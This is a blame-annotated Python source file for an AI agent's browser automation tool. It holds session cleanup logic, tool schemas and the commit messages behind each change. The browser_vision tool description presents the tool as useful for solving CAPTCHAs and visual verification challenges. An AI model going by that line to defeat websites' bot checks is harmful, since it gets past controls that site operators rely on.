# Track active sessions per task
2026-03-07 01:14:57 -08:00
# Stores: session_name (always), bb_session_id + cdp_url (cloud mode only)
2026-03-14 11:34:31 -07:00
_active_sessions : Dict [ str , Dict [ str , str ] ] = { } # task_id -> {session_name, ...}
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
_recording_sessions : set = set ( ) # task_ids with active recordings
2026-01-29 06:10:24 +00:00
# Flag to track if cleanup has been done
_cleanup_done = False
2026-01-31 21:42:15 -08:00
# =============================================================================
# Inactivity Timeout Configuration
# =============================================================================
# Session inactivity timeout (seconds) - cleanup if no activity for this long
2026-02-21 00:44:25 -08:00
# Default: 5 minutes. Needs headroom for LLM reasoning between browser commands,
# especially when subagents are doing multi-step browser tasks.
2026-03-14 11:34:31 -07:00
BROWSER_SESSION_INACTIVITY_TIMEOUT = int ( os . environ . get ( " BROWSER_INACTIVITY_TIMEOUT " , " 300 " ) )
2026-01-31 21:42:15 -08:00
# Track last activity time per session
_session_last_activity : Dict [ str , float ] = { }
# Background cleanup thread state
_cleanup_thread = None
_cleanup_running = False
2026-02-21 00:44:25 -08:00
# Protects _session_last_activity AND _active_sessions for thread safety
# (subagents run concurrently via ThreadPoolExecutor)
2026-01-31 21:42:15 -08:00
_cleanup_lock = threading . Lock ( )
2026-01-29 06:10:24 +00:00
def _emergency_cleanup_all_sessions ( ) :
"""
Emergency cleanup of all active browser sessions .
Called on process exit or interrupt to prevent orphaned sessions .
"""
global _cleanup_done
if _cleanup_done :
return
_cleanup_done = True
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
if not _active_sessions :
return
2026-03-14 11:34:31 -07:00
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
logger . info ( " Emergency cleanup: closing %s active session(s)... " ,
len ( _active_sessions ) )
2026-03-07 01:14:57 -08:00
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
try :
cleanup_all_browsers ( )
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-02-21 03:11:11 -08:00
logger . error ( " Emergency cleanup error: %s " , e )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
finally :
with _cleanup_lock :
_active_sessions . clear ( )
_session_last_activity . clear ( )
_recording_sessions . clear ( )
2026-01-29 06:10:24 +00:00
2026-03-10 12:39:13 +03:00
# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
# handlers that called sys.exit(), but this conflicts with prompt_toolkit's
# async event loop — a SystemExit raised inside a key-binding callback
# corrupts the coroutine state and makes the process unkillable. atexit
# handlers run on any normal exit (including sys.exit), so browser sessions
# are still cleaned up without hijacking signals.
2026-01-29 06:10:24 +00:00
atexit . register ( _emergency_cleanup_all_sessions )
2026-01-31 21:42:15 -08:00
# =============================================================================
# Inactivity Cleanup Functions
# =============================================================================
def _cleanup_inactive_browser_sessions ( ) :
"""
Clean up browser sessions that have been inactive for longer than the timeout .
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
This function is called periodically by the background cleanup thread to
automatically close sessions that haven ' t been used recently, preventing
2026-03-07 01:14:57 -08:00
orphaned sessions ( local or Browserbase ) from accumulating .
2026-01-31 21:42:15 -08:00
"""
current_time = time . time ( )
sessions_to_cleanup = [ ]
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
with _cleanup_lock :
for task_id , last_time in list ( _session_last_activity . items ( ) ) :
if current_time - last_time > BROWSER_SESSION_INACTIVITY_TIMEOUT :
sessions_to_cleanup . append ( task_id )
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
for task_id in sessions_to_cleanup :
try :
2026-03-14 11:34:31 -07:00
elapsed = int ( current_time - _session_last_activity . get ( task_id , current_time ) )
logger . info ( " Cleaning up inactive session for task: %s (inactive for %s s) " , task_id , elapsed )
2026-01-31 21:42:15 -08:00
cleanup_browser ( task_id )
with _cleanup_lock :
if task_id in _session_last_activity :
del _session_last_activity [ task_id ]
except Exception as e :
2026-03-14 11:34:31 -07:00
logger . warning ( " Error cleaning up inactive session %s : %s " , task_id , e )
2026-01-31 21:42:15 -08:00
def _browser_cleanup_thread_worker ( ) :
"""
Background thread that periodically cleans up inactive browser sessions .
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
Runs every 30 seconds and checks for sessions that haven ' t been used
within the BROWSER_SESSION_INACTIVITY_TIMEOUT period .
"""
while _cleanup_running :
try :
_cleanup_inactive_browser_sessions ( )
except Exception as e :
2026-02-21 03:11:11 -08:00
logger . warning ( " Cleanup thread error: %s " , e )
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
# Sleep in 1-second intervals so we can stop quickly if needed
for _ in range ( 30 ) :
if not _cleanup_running :
break
time . sleep ( 1 )
def _start_browser_cleanup_thread ( ) :
""" Start the background cleanup thread if not already running. """
global _cleanup_thread , _cleanup_running
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
with _cleanup_lock :
if _cleanup_thread is None or not _cleanup_thread . is_alive ( ) :
_cleanup_running = True
_cleanup_thread = threading . Thread (
target = _browser_cleanup_thread_worker ,
daemon = True ,
name = " browser-cleanup "
)
_cleanup_thread . start ( )
2026-03-14 11:34:31 -07:00
logger . info ( " Started inactivity cleanup thread (timeout: %s s) " , BROWSER_SESSION_INACTIVITY_TIMEOUT )
2026-01-31 21:42:15 -08:00
def _stop_browser_cleanup_thread ( ) :
""" Stop the background cleanup thread. """
global _cleanup_running
_cleanup_running = False
if _cleanup_thread is not None :
_cleanup_thread . join ( timeout = 5 )
def _update_session_activity ( task_id : str ) :
""" Update the last activity timestamp for a session. """
with _cleanup_lock :
_session_last_activity [ task_id ] = time . time ( )
# Register cleanup thread stop on exit
atexit . register ( _stop_browser_cleanup_thread )
2026-01-29 06:10:24 +00:00
# ============================================================================
# Tool Schemas
# ============================================================================
BROWSER_TOOL_SCHEMAS = [
{
" name " : " browser_navigate " ,
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
" description " : " Navigate to a URL in the browser. Initializes the session and loads the page. Must be called before other browser tools. For simple information retrieval, prefer web_search or web_extract (faster, cheaper). Use browser tools when you need to interact with a page (click, fill forms, dynamic content). Returns a compact page snapshot with interactive elements and ref IDs — no need to call browser_snapshot separately after navigating. " ,
2026-01-29 06:10:24 +00:00
" parameters " : {
" type " : " object " ,
" properties " : {
" url " : {
" type " : " string " ,
" description " : " The URL to navigate to (e.g., ' https://example.com ' ) "
}
} ,
" required " : [ " url " ]
}
} ,
{
" name " : " browser_snapshot " ,
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
" description " : " Get a text-based snapshot of the current page ' s accessibility tree. Returns interactive elements with ref IDs (like @e1, @e2) for browser_click and browser_type. full=false (default): compact view with interactive elements. full=true: complete page content. Snapshots over 8000 chars are truncated or LLM-summarized. Requires browser_navigate first. Note: browser_navigate already returns a compact snapshot — use this to refresh after interactions that change the page, or with full=true for complete content. " ,
2026-01-29 06:10:24 +00:00
" parameters " : {
" type " : " object " ,
" properties " : {
" full " : {
" type " : " boolean " ,
" description " : " If true, returns complete page content. If false (default), returns compact view with interactive elements only. " ,
" default " : False
}
} ,
" required " : [ ]
}
} ,
{
" name " : " browser_click " ,
" description " : " Click on an element identified by its ref ID from the snapshot (e.g., ' @e5 ' ). The ref IDs are shown in square brackets in the snapshot output. Requires browser_navigate and browser_snapshot to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" ref " : {
" type " : " string " ,
" description " : " The element reference from the snapshot (e.g., ' @e5 ' , ' @e12 ' ) "
}
} ,
" required " : [ " ref " ]
}
} ,
{
" name " : " browser_type " ,
" description " : " Type text into an input field identified by its ref ID. Clears the field first, then types the new text. Requires browser_navigate and browser_snapshot to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" ref " : {
" type " : " string " ,
" description " : " The element reference from the snapshot (e.g., ' @e3 ' ) "
} ,
" text " : {
" type " : " string " ,
" description " : " The text to type into the field "
}
} ,
" required " : [ " ref " , " text " ]
}
} ,
{
" name " : " browser_scroll " ,
" description " : " Scroll the page in a direction. Use this to reveal more content that may be below or above the current viewport. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" direction " : {
" type " : " string " ,
" enum " : [ " up " , " down " ] ,
" description " : " Direction to scroll "
}
} ,
" required " : [ " direction " ]
}
} ,
{
" name " : " browser_back " ,
" description " : " Navigate back to the previous page in browser history. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : { } ,
" required " : [ ]
}
} ,
{
" name " : " browser_press " ,
" description " : " Press a keyboard key. Useful for submitting forms (Enter), navigating (Tab), or keyboard shortcuts. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : {
" key " : {
" type " : " string " ,
" description " : " Key to press (e.g., ' Enter ' , ' Tab ' , ' Escape ' , ' ArrowDown ' ) "
}
} ,
" required " : [ " key " ]
}
} ,
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
{
" name " : " browser_close " ,
" description " : " Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota. " ,
" parameters " : {
" type " : " object " ,
" properties " : { } ,
" required " : [ ]
}
} ,
2026-01-29 06:10:24 +00:00
{
" name " : " browser_get_images " ,
" description " : " Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first. " ,
" parameters " : {
" type " : " object " ,
" properties " : { } ,
" required " : [ ]
}
} ,
{
" name " : " browser_vision " ,
2026-03-07 22:57:05 -08:00
" description " : " Take a screenshot of the current page and analyze it with vision AI. Use this when you need to visually understand what ' s on the page - especially useful for CAPTCHAs, visual verification challenges, complex layouts, or when the text snapshot doesn ' t capture important visual information. Returns both the AI analysis and a screenshot_path that you can share with the user by including MEDIA:<screenshot_path> in your response. Requires browser_navigate to be called first. " ,
2026-01-29 06:10:24 +00:00
" parameters " : {
" type " : " object " ,
" properties " : {
" question " : {
" type " : " string " ,
" description " : " What you want to know about the page visually. Be specific about what you ' re looking for. "
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
} ,
" annotate " : {
" type " : " boolean " ,
" default " : False ,
" description " : " If true, overlay numbered [N] labels on interactive elements. Each [N] maps to ref @eN for subsequent browser commands. Useful for QA and spatial reasoning about page layout. "
2026-01-29 06:10:24 +00:00
}
} ,
" required " : [ " question " ]
}
} ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
{
" name " : " browser_console " ,
2026-04-05 12:42:52 -07:00
" description " : " Get browser console output and JavaScript errors from the current page. Returns console.log/warn/error/info messages and uncaught JS exceptions. Use this to detect silent JavaScript errors, failed API calls, and application warnings. Requires browser_navigate to be called first. When ' expression ' is provided, evaluates JavaScript in the page context and returns the result — use this for DOM inspection, reading page state, or extracting data programmatically. " ,
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
" parameters " : {
" type " : " object " ,
" properties " : {
" clear " : {
" type " : " boolean " ,
" default " : False ,
" description " : " If true, clear the message buffers after reading "
2026-04-05 12:42:52 -07:00
} ,
" expression " : {
" type " : " string " ,
" description " : " JavaScript expression to evaluate in the page context. Runs in the browser like DevTools console — full access to DOM, window, document. Return values are serialized to JSON. Example: ' document.title ' or ' document.querySelectorAll( \" a \" ).length ' "
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
}
} ,
" required " : [ ]
}
} ,
2026-01-29 06:10:24 +00:00
]
# ============================================================================
# Utility Functions
# ============================================================================
2026-03-07 01:14:57 -08:00
def _create_local_session ( task_id : str ) - > Dict [ str , str ] :
import uuid
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
